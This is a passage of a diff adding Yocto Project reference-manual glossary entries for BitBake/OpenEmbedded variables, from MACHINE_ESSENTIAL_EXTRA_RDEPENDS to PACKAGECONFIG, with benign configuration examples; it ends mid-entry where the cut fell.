+ :term:`MACHINE_ESSENTIAL_EXTRA_RDEPENDS`
+ A list of required machine-specific packages to install as part of
+ the image being built. The build process depends on these packages
+ being present. Furthermore, because this is a "machine-essential"
+ variable, the list of packages are essential for the machine to boot.
+ The impact of this variable affects images based on
+ ``packagegroup-core-boot``, including the ``core-image-minimal``
+ image.
+
+ This variable is similar to the
+ ``MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`` variable with the exception
+ that the image being built has a build dependency on the variable's
+ list of packages. In other words, the image will not build if a file
+ in this list is not found.
+
+ As an example, suppose the machine for which you are building
+ requires ``example-init`` to be run during boot to initialize the
+ hardware. In this case, you would use the following in the machine's
+ ``.conf`` configuration file:
+ ::
+
+ MACHINE_ESSENTIAL_EXTRA_RDEPENDS += "example-init"
+
+ :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+ A list of recommended machine-specific packages to install as part of
+ the image being built. The build process does not depend on these
+ packages being present. However, because this is a
+ "machine-essential" variable, the list of packages are essential for
+ the machine to boot. The impact of this variable affects images based
+ on ``packagegroup-core-boot``, including the ``core-image-minimal``
+ image.
+
+ This variable is similar to the ``MACHINE_ESSENTIAL_EXTRA_RDEPENDS``
+ variable with the exception that the image being built does not have
+ a build dependency on the variable's list of packages. In other
+ words, the image will still build if a package in this list is not
+ found. Typically, this variable is used to handle essential kernel
+ modules, whose functionality may be selected to be built into the
+ kernel rather than as a module, in which case a package will not be
+ produced.
+
+ Consider an example where you have a custom kernel where a specific
+ touchscreen driver is required for the machine to be usable. However,
+ the driver can be built as a module or into the kernel depending on
+ the kernel configuration. If the driver is built as a module, you
+ want it to be installed. But, when the driver is built into the
+ kernel, you still want the build to succeed. This variable sets up a
+ "recommends" relationship so that in the latter case, the build will
+ not fail due to the missing package. To accomplish this, assuming the
+ package for the module was called ``kernel-module-ab123``, you would
+ use the following in the machine's ``.conf`` configuration file:
+ ::
+
+ MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-module-ab123"
+
+ .. note::
+
+ In this example, the ``kernel-module-ab123`` recipe needs to
+ explicitly set its :term:`PACKAGES` variable to ensure that BitBake
+ does not use the kernel recipe's :term:`PACKAGES_DYNAMIC` variable to
+ satisfy the dependency.
+
+ Some examples of these machine essentials are flash, screen,
+ keyboard, mouse, or touchscreen drivers (depending on the machine).
+
+ :term:`MACHINE_EXTRA_RDEPENDS`
+ A list of machine-specific packages to install as part of the image
+ being built that are not essential for the machine to boot. However,
+ the build process for more fully-featured images depends on the
+ packages being present.
+
+ This variable affects all images based on ``packagegroup-base``,
+ which does not include the ``core-image-minimal`` or
+ ``core-image-full-cmdline`` images.
+
+ The variable is similar to the ``MACHINE_EXTRA_RRECOMMENDS`` variable
+ with the exception that the image being built has a build dependency
+ on the variable's list of packages. In other words, the image will
+ not build if a file in this list is not found.
+
+ An example is a machine that has WiFi capability but is not essential
+ for the machine to boot the image. However, if you are building a
+ more fully-featured image, you want to enable the WiFi. The package
+ containing the firmware for the WiFi hardware is always expected to
+ exist, so it is acceptable for the build process to depend upon
+ finding the package. In this case, assuming the package for the
+ firmware was called ``wifidriver-firmware``, you would use the
+ following in the ``.conf`` file for the machine:
+ ::
+
+ MACHINE_EXTRA_RDEPENDS += "wifidriver-firmware"
+
+ :term:`MACHINE_EXTRA_RRECOMMENDS`
+ A list of machine-specific packages to install as part of the image
+ being built that are not essential for booting the machine. The image
+ being built has no build dependency on this list of packages.
+
+ This variable affects only images based on ``packagegroup-base``,
+ which does not include the ``core-image-minimal`` or
+ ``core-image-full-cmdline`` images.
+
+ This variable is similar to the ``MACHINE_EXTRA_RDEPENDS`` variable
+ with the exception that the image being built does not have a build
+ dependency on the variable's list of packages. In other words, the
+ image will build if a file in this list is not found.
+
+ An example is a machine that has WiFi capability but is not essential
+ For the machine to boot the image. However, if you are building a
+ more fully-featured image, you want to enable WiFi. In this case, the
+ package containing the WiFi kernel module will not be produced if the
+ WiFi driver is built into the kernel, in which case you still want
+ the build to succeed instead of failing as a result of the package
+ not being found. To accomplish this, assuming the package for the
+ module was called ``kernel-module-examplewifi``, you would use the
+ following in the ``.conf`` file for the machine:
+ ::
+
+ MACHINE_EXTRA_RRECOMMENDS += "kernel-module-examplewifi"
+
+ :term:`MACHINE_FEATURES`
+ Specifies the list of hardware features the
+ :term:`MACHINE` is capable of supporting. For related
+ information on enabling features, see the
+ :term:`DISTRO_FEATURES`,
+ :term:`COMBINED_FEATURES`, and
+ :term:`IMAGE_FEATURES` variables.
+
+ For a list of hardware features supported by the Yocto Project as
+ shipped, see the ":ref:`ref-features-machine`" section.
+
+ :term:`MACHINE_FEATURES_BACKFILL`
+ Features to be added to ``MACHINE_FEATURES`` if not also present in
+ ``MACHINE_FEATURES_BACKFILL_CONSIDERED``.
+
+ This variable is set in the ``meta/conf/bitbake.conf`` file. It is
+ not intended to be user-configurable. It is best to just reference
+ the variable to see which machine features are being backfilled for
+ all machine configurations. See the ":ref:`ref-features-backfill`"
+ section for more information.
+
+ :term:`MACHINE_FEATURES_BACKFILL_CONSIDERED`
+ Features from ``MACHINE_FEATURES_BACKFILL`` that should not be
+ backfilled (i.e. added to ``MACHINE_FEATURES``) during the build. See
+ the ":ref:`ref-features-backfill`" section for more information.
+
+ :term:`MACHINEOVERRIDES`
+ A colon-separated list of overrides that apply to the current
+ machine. By default, this list includes the value of
+ :term:`MACHINE`.
+
+ You can extend ``MACHINEOVERRIDES`` to add extra overrides that
+ should apply to a machine. For example, all machines emulated in QEMU
+ (e.g. ``qemuarm``, ``qemux86``, and so forth) include a file named
+ ``meta/conf/machine/include/qemu.inc`` that prepends the following
+ override to ``MACHINEOVERRIDES``:
+ ::
+
+ MACHINEOVERRIDES =. "qemuall:"
+
+ This
+ override allows variables to be overridden for all machines emulated
+ in QEMU, like in the following example from the ``connman-conf``
+ recipe:
+ ::
+
+ SRC_URI_append_qemuall = " file://wired.config \
+ file://wired-setup \
+ "
+
+ The underlying mechanism behind
+ ``MACHINEOVERRIDES`` is simply that it is included in the default
+ value of :term:`OVERRIDES`.
+
+ :term:`MAINTAINER`
+ The email address of the distribution maintainer.
+
+ :term:`MIRRORS`
+ Specifies additional paths from which the OpenEmbedded build system
+ gets source code. When the build system searches for source code, it
+ first tries the local download directory. If that location fails, the
+ build system tries locations defined by
+ :term:`PREMIRRORS`, the upstream source, and then
+ locations specified by ``MIRRORS`` in that order.
+
+ Assuming your distribution (:term:`DISTRO`) is "poky",
+ the default value for ``MIRRORS`` is defined in the
+ ``conf/distro/poky.conf`` file in the ``meta-poky`` Git repository.
+
+ :term:`MLPREFIX`
+ Specifies a prefix has been added to :term:`PN` to create a
+ special version of a recipe or package (i.e. a Multilib version). The
+ variable is used in places where the prefix needs to be added to or
+ removed from a the name (e.g. the :term:`BPN` variable).
+ ``MLPREFIX`` gets set when a prefix has been added to ``PN``.
+
+ .. note::
+
+ The "ML" in ``MLPREFIX`` stands for "MultiLib". This representation is
+ historical and comes from a time when ``nativesdk`` was a suffix
+ rather than a prefix on the recipe name. When ``nativesdk`` was turned
+ into a prefix, it made sense to set ``MLPREFIX`` for it as well.
+
+ To help understand when ``MLPREFIX`` might be needed, consider when
+ :term:`BBCLASSEXTEND` is used to provide a
+ ``nativesdk`` version of a recipe in addition to the target version.
+ If that recipe declares build-time dependencies on tasks in other
+ recipes by using :term:`DEPENDS`, then a dependency on
+ "foo" will automatically get rewritten to a dependency on
+ "nativesdk-foo". However, dependencies like the following will not
+ get rewritten automatically:
+ ::
+
+ do_foo[depends] += "recipe:do_foo"
+
+ If you want such a dependency to also get transformed, you can do the
+ following:
+ ::
+
+ do_foo[depends] += "${MLPREFIX}recipe:do_foo"
+
+ module_autoload
+ This variable has been replaced by the ``KERNEL_MODULE_AUTOLOAD``
+ variable. You should replace all occurrences of ``module_autoload``
+ with additions to ``KERNEL_MODULE_AUTOLOAD``, for example:
+ ::
+
+ module_autoload_rfcomm = "rfcomm"
+
+ should now be replaced with:
+ ::
+
+ KERNEL_MODULE_AUTOLOAD += "rfcomm"
+
+ See the :term:`KERNEL_MODULE_AUTOLOAD` variable for more information.
+
+ module_conf
+ Specifies `modprobe.d <http://linux.die.net/man/5/modprobe.d>`_
+ syntax lines for inclusion in the ``/etc/modprobe.d/modname.conf``
+ file.
+
+ You can use this variable anywhere that it can be recognized by the
+ kernel recipe or out-of-tree kernel module recipe (e.g. a machine
+ configuration file, a distribution configuration file, an append file
+ for the recipe, or the recipe itself). If you use this variable, you
+ must also be sure to list the module name in the
+ :term:`KERNEL_MODULE_AUTOLOAD`
+ variable.
+
+ Here is the general syntax:
+ ::
+
+ module_conf_module_name = "modprobe.d-syntax"
+
+ You must use the kernel module name override.
+
+ Run ``man modprobe.d`` in the shell to find out more information on
+ the exact syntax you want to provide with ``module_conf``.
+
+ Including ``module_conf`` causes the OpenEmbedded build system to
+ populate the ``/etc/modprobe.d/modname.conf`` file with
+ ``modprobe.d`` syntax lines. Here is an example that adds the options
+ ``arg1`` and ``arg2`` to a module named ``mymodule``:
+ ::
+
+ module_conf_mymodule = "options mymodule arg1=val1 arg2=val2"
+
+ For information on how to specify kernel modules to auto-load on
+ boot, see the :term:`KERNEL_MODULE_AUTOLOAD` variable.
+
+ :term:`MODULE_TARBALL_DEPLOY`
+ Controls creation of the ``modules-*.tgz`` file. Set this variable to
+ "0" to disable creation of this file, which contains all of the
+ kernel modules resulting from a kernel build.
+
+ :term:`MODULE_TARBALL_LINK_NAME`
+ The link name of the kernel module tarball. This variable is set in
+ the ``meta/classes/kernel-artifact-names.bbclass`` file as follows:
+ ::
+
+ MODULE_TARBALL_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
+
+ The value
+ of the ``KERNEL_ARTIFACT_LINK_NAME`` variable, which is set in the
+ same file, has the following value:
+ ::
+
+ KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
+
+ See the :term:`MACHINE` variable for additional information.
+
+ :term:`MODULE_TARBALL_NAME`
+ The base name of the kernel module tarball. This variable is set in
+ the ``meta/classes/kernel-artifact-names.bbclass`` file as follows:
+ ::
+
+ MODULE_TARBALL_NAME ?= "${KERNEL_ARTIFACT_NAME}"
+
+ The value of the :term:`KERNEL_ARTIFACT_NAME` variable,
+ which is set in the same file, has the following value:
+ ::
+
+ KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+ :term:`MULTIMACH_TARGET_SYS`
+ Uniquely identifies the type of the target system for which packages
+ are being built. This variable allows output for different types of
+ target systems to be put into different subdirectories of the same
+ output directory.
+
+ The default value of this variable is:
+ ::
+
+ ${PACKAGE_ARCH}${TARGET_VENDOR}-${TARGET_OS}
+
+ Some classes (e.g.
+ :ref:`cross-canadian <ref-classes-cross-canadian>`) modify the
+ ``MULTIMACH_TARGET_SYS`` value.
+
+ See the :term:`STAMP` variable for an example. See the
+ :term:`STAGING_DIR_TARGET` variable for more information.
+
+ :term:`NATIVELSBSTRING`
+ A string identifying the host distribution. Strings consist of the
+ host distributor ID followed by the release, as reported by the
+ ``lsb_release`` tool or as read from ``/etc/lsb-release``. For
+ example, when running a build on Ubuntu 12.10, the value is
+ "Ubuntu-12.10". If this information is unable to be determined, the
+ value resolves to "Unknown".
+
+ This variable is used by default to isolate native shared state
+ packages for different distributions (e.g. to avoid problems with
+ ``glibc`` version incompatibilities). Additionally, the variable is
+ checked against
+ :term:`SANITY_TESTED_DISTROS` if that
+ variable is set.
+
+ :term:`NM`
+ The minimal command and arguments to run ``nm``.
+
+ :term:`NO_GENERIC_LICENSE`
+ Avoids QA errors when you use a non-common, non-CLOSED license in a
+ recipe. Packages exist, such as the linux-firmware package, with many
+ licenses that are not in any way common. Also, new licenses are added
+ occasionally to avoid introducing a lot of common license files,
+ which are only applicable to a specific package.
+ ``NO_GENERIC_LICENSE`` is used to allow copying a license that does
+ not exist in common licenses.
+
+ The following example shows how to add ``NO_GENERIC_LICENSE`` to a
+ recipe:
+ ::
+
+ NO_GENERIC_LICENSE[license_name] = "license_file_in_fetched_source"
+
+ The following is an example that
+ uses the ``LICENSE.Abilis.txt`` file as the license from the fetched
+ source:
+ ::
+
+ NO_GENERIC_LICENSE[Firmware-Abilis] = "LICENSE.Abilis.txt"
+
+ :term:`NO_RECOMMENDATIONS`
+ Prevents installation of all "recommended-only" packages.
+ Recommended-only packages are packages installed only through the
+ :term:`RRECOMMENDS` variable). Setting the
+ ``NO_RECOMMENDATIONS`` variable to "1" turns this feature on: ::
+
+ NO_RECOMMENDATIONS = "1"
+
+ You can set this variable globally in your ``local.conf`` file or you
+ can attach it to a specific image recipe by using the recipe name
+ override: ::
+
+ NO_RECOMMENDATIONS_pn-target_image = "1"
+
+ It is important to realize that if you choose to not install packages
+ using this variable and some other packages are dependent on them
+ (i.e. listed in a recipe's :term:`RDEPENDS`
+ variable), the OpenEmbedded build system ignores your request and
+ will install the packages to avoid dependency errors.
+
+ .. note::
+
+ Some recommended packages might be required for certain system
+ functionality, such as kernel modules. It is up to you to add
+ packages with the :term:`IMAGE_INSTALL` variable.
+
+ Support for this variable exists only when using the IPK and RPM
+ packaging backend. Support does not exist for DEB.
+
+ See the :term:`BAD_RECOMMENDATIONS` and
+ the :term:`PACKAGE_EXCLUDE` variables for
+ related information.
+
+ :term:`NOAUTOPACKAGEDEBUG`
+ Disables auto package from splitting ``.debug`` files. If a recipe
+ requires ``FILES_${PN}-dbg`` to be set manually, the
+ ``NOAUTOPACKAGEDEBUG`` can be defined allowing you to define the
+ content of the debug package. For example:
+ ::
+
+ NOAUTOPACKAGEDEBUG = "1"
+ FILES_${PN}-dev = "${includedir}/${QT_DIR_NAME}/Qt/*"
+ FILES_${PN}-dbg = "/usr/src/debug/"
+ FILES_${QT_BASE_NAME}-demos-doc = "${docdir}/${QT_DIR_NAME}/qch/qt.qch"
+
+ :term:`OBJCOPY`
+ The minimal command and arguments to run ``objcopy``.
+
+ :term:`OBJDUMP`
+ The minimal command and arguments to run ``objdump``.
+
+ :term:`OE_BINCONFIG_EXTRA_MANGLE`
+ When inheriting the :ref:`binconfig <ref-classes-binconfig>` class,
+ this variable specifies additional arguments passed to the "sed"
+ command. The sed command alters any paths in configuration scripts
+ that have been set up during compilation. Inheriting this class
+ results in all paths in these scripts being changed to point into the
+ ``sysroots/`` directory so that all builds that use the script will
+ use the correct directories for the cross compiling layout.
+
+ See the ``meta/classes/binconfig.bbclass`` in the
+ :term:`Source Directory` for details on how this class
+ applies these additional sed command arguments. For general
+ information on the ``binconfig`` class, see the
+ ":ref:`binconfig.bbclass <ref-classes-binconfig>`" section.
+
+ :term:`OE_IMPORTS`
+ An internal variable used to tell the OpenEmbedded build system what
+ Python modules to import for every Python function run by the system.
+
+ .. note::
+
+ Do not set this variable. It is for internal use only.
+
+ :term:`OE_INIT_ENV_SCRIPT`
+ The name of the build environment setup script for the purposes of
+ setting up the environment within the extensible SDK. The default
+ value is "oe-init-build-env".
+
+ If you use a custom script to set up your build environment, set the
+ ``OE_INIT_ENV_SCRIPT`` variable to its name.
+
+ :term:`OE_TERMINAL`
+ Controls how the OpenEmbedded build system spawns interactive
+ terminals on the host development system (e.g. using the BitBake
+ command with the ``-c devshell`` command-line option). For more
+ information, see the ":ref:`platdev-appdev-devshell`" section in
+ the Yocto Project Development Tasks Manual.
+
+ You can use the following values for the ``OE_TERMINAL`` variable:
+
+ - auto
+ - gnome
+ - xfce
+ - rxvt
+ - screen
+ - konsole
+ - none
+
+ :term:`OEROOT`
+ The directory from which the top-level build environment setup script
+ is sourced. The Yocto Project provides a top-level build environment
+ setup script: :ref:`structure-core-script`. When you run this
+ script, the ``OEROOT`` variable resolves to the directory that
+ contains the script.
+
+ For additional information on how this variable is used, see the
+ initialization script.
+
+ :term:`OLDEST_KERNEL`
+ Declares the oldest version of the Linux kernel that the produced
+ binaries must support. This variable is passed into the build of the
+ Embedded GNU C Library (``glibc``).
+
+ The default for this variable comes from the
+ ``meta/conf/bitbake.conf`` configuration file. You can override this
+ default by setting the variable in a custom distribution
+ configuration file.
+
+ :term:`OVERRIDES`
+ A colon-separated list of overrides that currently apply. Overrides
+ are a BitBake mechanism that allows variables to be selectively
+ overridden at the end of parsing. The set of overrides in
+ ``OVERRIDES`` represents the "state" during building, which includes
+ the current recipe being built, the machine for which it is being
+ built, and so forth.
+
+ As an example, if the string "an-override" appears as an element in
+ the colon-separated list in ``OVERRIDES``, then the following
+ assignment will override ``FOO`` with the value "overridden" at the
+ end of parsing:
+ ::
+
+ FOO_an-override = "overridden"
+
+ See the
+ ":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:conditional syntax (overrides)`"
+ section in the BitBake User Manual for more information on the
+ overrides mechanism.
+
+ The default value of ``OVERRIDES`` includes the values of the
+ :term:`CLASSOVERRIDE`,
+ :term:`MACHINEOVERRIDES`, and
+ :term:`DISTROOVERRIDES` variables. Another
+ important override included by default is ``pn-${PN}``. This override
+ allows variables to be set for a single recipe within configuration
+ (``.conf``) files. Here is an example:
+ ::
+
+ FOO_pn-myrecipe = "myrecipe-specific value"
+
+ .. note::
+
+ An easy way to see what overrides apply is to search for ``OVERRIDES``
+ in the output of the ``bitbake -e`` command. See the
+ ":ref:`dev-debugging-viewing-variable-values`" section in the Yocto
+ Project Development Tasks Manual for more information.
+
+ :term:`P`
+ The recipe name and version. ``P`` is comprised of the following:
+ ::
+
+ ${PN}-${PV}
+
+ :term:`PACKAGE_ADD_METADATA`
+ This variable defines additional metdata to add to packages.
+
+ You may find you need to inject additional metadata into packages.
+ This variable allows you to do that by setting the injected data as
+ the value. Multiple fields can be added by splitting the content with
+ the literal separator "\n".
+
+ The suffixes '_IPK', '_DEB', or '_RPM' can be applied to the variable
+ to do package type specific settings. It can also be made package
+ specific by using the package name as a suffix.
+
+ You can find out more about applying this variable in the
+ ":ref:`dev-manual/dev-manual-common-tasks:adding custom metadata to packages`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`PACKAGE_ARCH`
+ The architecture of the resulting package or packages.
+
+ By default, the value of this variable is set to
+ :term:`TUNE_PKGARCH` when building for the
+ target, :term:`BUILD_ARCH` when building for the
+ build host, and "${SDK_ARCH}-${SDKPKGSUFFIX}" when building for the
+ SDK.
+
+ .. note::
+
+ See :term:`SDK_ARCH` for more information.
+
+ However, if your recipe's output packages are built specific to the
+ target machine rather than generally for the architecture of the
+ machine, you should set ``PACKAGE_ARCH`` to the value of
+ :term:`MACHINE_ARCH` in the recipe as follows:
+ ::
+
+ PACKAGE_ARCH = "${MACHINE_ARCH}"
+
+ :term:`PACKAGE_ARCHS`
+ Specifies a list of architectures compatible with the target machine.
+ This variable is set automatically and should not normally be
+ hand-edited. Entries are separated using spaces and listed in order
+ of priority. The default value for ``PACKAGE_ARCHS`` is "all any
+ noarch ${PACKAGE_EXTRA_ARCHS} ${MACHINE_ARCH}".
+
+ :term:`PACKAGE_BEFORE_PN`
+ Enables easily adding packages to ``PACKAGES`` before ``${PN}`` so
+ that those added packages can pick up files that would normally be
+ included in the default package.
+
+ :term:`PACKAGE_CLASSES`
+ This variable, which is set in the ``local.conf`` configuration file
+ found in the ``conf`` folder of the
+ :term:`Build Directory`, specifies the package manager the
+ OpenEmbedded build system uses when packaging data.
+
+ You can provide one or more of the following arguments for the
+ variable: PACKAGE_CLASSES ?= "package_rpm package_deb package_ipk
+ package_tar"
+
+ .. note::
+
+ While it is a legal option, the ``package_tar``
+ class has limited functionality due to no support for package
+ dependencies by that backend. Therefore, it is recommended that
+ you do not use it.
+
+ The build system uses only the first argument in the list as the
+ package manager when creating your image or SDK. However, packages
+ will be created using any additional packaging classes you specify.
+ For example, if you use the following in your ``local.conf`` file:
+ ::
+
+ PACKAGE_CLASSES ?= "package_ipk"
+
+ The OpenEmbedded build system uses
+ the IPK package manager to create your image or SDK.
+
+ For information on packaging and build performance effects as a
+ result of the package manager in use, see the
+ ":ref:`package.bbclass <ref-classes-package>`" section.
+
+ :term:`PACKAGE_DEBUG_SPLIT_STYLE`
+ Determines how to split up the binary and debug information when
+ creating ``*-dbg`` packages to be used with the GNU Project Debugger
+ (GDB).
+
+ With the ``PACKAGE_DEBUG_SPLIT_STYLE`` variable, you can control
+ where debug information, which can include or exclude source files,
+ is stored:
+
+ - ".debug": Debug symbol files are placed next to the binary in a
+ ``.debug`` directory on the target. For example, if a binary is
+ installed into ``/bin``, the corresponding debug symbol files are
+ installed in ``/bin/.debug``. Source files are placed in
+ ``/usr/src/debug``.
+
+ - "debug-file-directory": Debug symbol files are placed under
+ ``/usr/lib/debug`` on the target, and separated by the path from
+ where the binary is installed. For example, if a binary is
+ installed in ``/bin``, the corresponding debug symbols are
+ installed in ``/usr/lib/debug/bin``. Source files are placed in
+ ``/usr/src/debug``.
+
+ - "debug-without-src": The same behavior as ".debug" previously
+ described with the exception that no source files are installed.
+
+ - "debug-with-srcpkg": The same behavior as ".debug" previously
+ described with the exception that all source files are placed in a
+ separate ``*-src`` pkg. This is the default behavior.
+
+ You can find out more about debugging using GDB by reading the
+ ":ref:`platdev-gdb-remotedebug`" section
+ in the Yocto Project Development Tasks Manual.
+
+ :term:`PACKAGE_EXCLUDE_COMPLEMENTARY`
+ Prevents specific packages from being installed when you are
+ installing complementary packages.
+
+ You might find that you want to prevent installing certain packages
+ when you are installing complementary packages. For example, if you
+ are using :term:`IMAGE_FEATURES` to install
+ ``dev-pkgs``, you might not want to install all packages from a
+ particular multilib. If you find yourself in this situation, you can
+ use the ``PACKAGE_EXCLUDE_COMPLEMENTARY`` variable to specify regular
+ expressions to match the packages you want to exclude.
+
+ :term:`PACKAGE_EXCLUDE`
+ Lists packages that should not be installed into an image. For
+ example:
+ ::
+
+ PACKAGE_EXCLUDE = "package_name package_name package_name ..."
+
+ You can set this variable globally in your ``local.conf`` file or you
+ can attach it to a specific image recipe by using the recipe name
+ override:
+ ::
+
+ PACKAGE_EXCLUDE_pn-target_image = "package_name"
+
+ If you choose to not install a package using this variable and some
+ other package is dependent on it (i.e. listed in a recipe's
+ :term:`RDEPENDS` variable), the OpenEmbedded build
+ system generates a fatal installation error. Because the build system
+ halts the process with a fatal error, you can use the variable with
+ an iterative development process to remove specific components from a
+ system.
+
+ Support for this variable exists only when using the IPK and RPM
+ packaging backend. Support does not exist for DEB.
+
+ See the :term:`NO_RECOMMENDATIONS` and the
+ :term:`BAD_RECOMMENDATIONS` variables for
+ related information.
+
+ :term:`PACKAGE_EXTRA_ARCHS`
+ Specifies the list of architectures compatible with the device CPU.
+ This variable is useful when you build for several different devices
+ that use miscellaneous processors such as XScale and ARM926-EJS.
+
+ :term:`PACKAGE_FEED_ARCHS`
+ Optionally specifies the package architectures used as part of the
+ package feed URIs during the build. When used, the
+ ``PACKAGE_FEED_ARCHS`` variable is appended to the final package feed
+ URI, which is constructed using the
+ :term:`PACKAGE_FEED_URIS` and
+ :term:`PACKAGE_FEED_BASE_PATHS`
+ variables.
+
+ .. note::
+
+ You can use the ``PACKAGE_FEED_ARCHS``
+ variable to whitelist specific package architectures. If you do
+ not need to whitelist specific architectures, which is a common
+ case, you can omit this variable. Omitting the variable results in
+ all available architectures for the current machine being included
+ into remote package feeds.
+
+ Consider the following example where the ``PACKAGE_FEED_URIS``,
+ ``PACKAGE_FEED_BASE_PATHS``, and ``PACKAGE_FEED_ARCHS`` variables are
+ defined in your ``local.conf`` file:
+ ::
+
+ PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
+ https://example.com/packagerepos/updates"
+ PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
+ PACKAGE_FEED_ARCHS = "all core2-64"
+
+ Given these settings, the resulting package feeds are as follows:
+
+ .. code-block:: none
+
+ https://example.com/packagerepos/release/rpm/all
+ https://example.com/packagerepos/release/rpm/core2-64
+ https://example.com/packagerepos/release/rpm-dev/all
+ https://example.com/packagerepos/release/rpm-dev/core2-64
+ https://example.com/packagerepos/updates/rpm/all
+ https://example.com/packagerepos/updates/rpm/core2-64
+ https://example.com/packagerepos/updates/rpm-dev/all
+ https://example.com/packagerepos/updates/rpm-dev/core2-64
+
+ :term:`PACKAGE_FEED_BASE_PATHS`
+ Specifies the base path used when constructing package feed URIs. The
+ ``PACKAGE_FEED_BASE_PATHS`` variable makes up the middle portion of a
+ package feed URI used by the OpenEmbedded build system. The base path
+ lies between the :term:`PACKAGE_FEED_URIS`
+ and :term:`PACKAGE_FEED_ARCHS` variables.
+
+ Consider the following example where the ``PACKAGE_FEED_URIS``,
+ ``PACKAGE_FEED_BASE_PATHS``, and ``PACKAGE_FEED_ARCHS`` variables are
+ defined in your ``local.conf`` file:
+ ::
+
+ PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
+ https://example.com/packagerepos/updates"
+ PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
+ PACKAGE_FEED_ARCHS = "all core2-64"
+
+ Given these settings, the resulting package feeds are as follows:
+
+ .. code-block:: none
+
+ https://example.com/packagerepos/release/rpm/all
+ https://example.com/packagerepos/release/rpm/core2-64
+ https://example.com/packagerepos/release/rpm-dev/all
+ https://example.com/packagerepos/release/rpm-dev/core2-64
+ https://example.com/packagerepos/updates/rpm/all
+ https://example.com/packagerepos/updates/rpm/core2-64
+ https://example.com/packagerepos/updates/rpm-dev/all
+ https://example.com/packagerepos/updates/rpm-dev/core2-64
+
+ :term:`PACKAGE_FEED_URIS`
+ Specifies the front portion of the package feed URI used by the
+ OpenEmbedded build system. Each final package feed URI is comprised
+ of ``PACKAGE_FEED_URIS``,
+ :term:`PACKAGE_FEED_BASE_PATHS`, and
+ :term:`PACKAGE_FEED_ARCHS` variables.
+
+ Consider the following example where the ``PACKAGE_FEED_URIS``,
+ ``PACKAGE_FEED_BASE_PATHS``, and ``PACKAGE_FEED_ARCHS`` variables are
+ defined in your ``local.conf`` file:
+ ::
+
+ PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
+ https://example.com/packagerepos/updates"
+ PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
+ PACKAGE_FEED_ARCHS = "all core2-64"
+
+ Given these settings, the resulting package feeds are as follows:
+
+ .. code-block:: none
+
+ https://example.com/packagerepos/release/rpm/all
+ https://example.com/packagerepos/release/rpm/core2-64
+ https://example.com/packagerepos/release/rpm-dev/all
+ https://example.com/packagerepos/release/rpm-dev/core2-64
+ https://example.com/packagerepos/updates/rpm/all
+ https://example.com/packagerepos/updates/rpm/core2-64
+ https://example.com/packagerepos/updates/rpm-dev/all
+ https://example.com/packagerepos/updates/rpm-dev/core2-64
+
+ :term:`PACKAGE_INSTALL`
+ The final list of packages passed to the package manager for
+ installation into the image.
+
+ Because the package manager controls actual installation of all
+ packages, the list of packages passed using ``PACKAGE_INSTALL`` is
+ not the final list of packages that are actually installed. This
+ variable is internal to the image construction code. Consequently, in
+ general, you should use the
+ :term:`IMAGE_INSTALL` variable to specify
+ packages for installation. The exception to this is when working with
+ the :ref:`core-image-minimal-initramfs <ref-manual/ref-images:images>`
+ image. When working with an initial RAM filesystem (initramfs) image,
+ use the ``PACKAGE_INSTALL`` variable. For information on creating an
+ initramfs, see the ":ref:`building-an-initramfs-image`" section
+ in the Yocto Project Development Tasks Manual.
+
+ :term:`PACKAGE_INSTALL_ATTEMPTONLY`
+ Specifies a list of packages the OpenEmbedded build system attempts
+ to install when creating an image. If a listed package fails to
+ install, the build system does not generate an error. This variable
+ is generally not user-defined.
+
+ :term:`PACKAGE_PREPROCESS_FUNCS`
+ Specifies a list of functions run to pre-process the
+ :term:`PKGD` directory prior to splitting the files out
+ to individual packages.
+
+ :term:`PACKAGE_WRITE_DEPS`
+ Specifies a list of dependencies for post-installation and
+ pre-installation scripts on native/cross tools. If your
+ post-installation or pre-installation script can execute at rootfs
+ creation time rather than on the target but depends on a native tool
+ in order to execute, you need to list the tools in
+ ``PACKAGE_WRITE_DEPS``.
+
+ For information on running post-installation scripts, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:post-installation scripts`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`PACKAGECONFIG`
+ This variable provides a means of enabling or disabling features of a
+ recipe on a per-recipe basis. ``PACKAGECONFIG`` blocks are defined in
+ recipes when you specify features and then arguments that define
+ feature behaviors. Here is the basic block structure (broken over
+ multiple lines for readability):
+ ::
+
+ PACKAGECONFIG ??= "f1 f2 f3 ..."
+ PACKAGECONFIG[f1] = "\
+ --with-f1, \
+ --without-f1, \
+ build-deps-for-f1, \
+ runtime-deps-for-f1, \
+ runtime-recommends-for-f1, \
+ packageconfig-conflicts-for-f1"
+ PACKAGECONFIG[f2] = "\
+ ... and so on and so on ...
+
+ The ``PACKAGECONFIG`` variable itself specifies a space-separated
+ list of the features to enable. Following the features, you can
+ determine the behavior of each feature by providing up to six
+ order-dependent arguments, which are separated by commas. You can
+ omit any argument you like but must retain the separating commas. The
+ order is important and specifies the following:
+
+ 1. Extra arguments that should be added to the configure script
+ argument list (:term:`EXTRA_OECONF` or
+ :term:`PACKAGECONFIG_CONFARGS`) if
+ the feature is enabled.
+
+ 2. Extra arguments that should be added to ``EXTRA_OECONF`` or
+ ``PACKAGECONFIG_CONFARGS`` if the feature is disabled.
+
+ 3. Additional build dependencies (:term:`DEPENDS`)
+ that should be added if the feature is enabled.
+
+ 4. Additional runtime dependencies (:term:`RDEPENDS`)
+ that should be added if the feature is enabled.
+
+ 5. Additional runtime recommendations
+ (:term:`RRECOMMENDS`) that should be added if
+ the feature is enabled.
+
+ 6. Any conflicting (that is, mutually exclusive) ``PACKAGECONFIG``
+ settings for this feature.
+
+ Consider the following ``PACKAGECONFIG`` block taken from the
+ ``librsvg`` recipe. In this example the feature is ``gtk``, which has
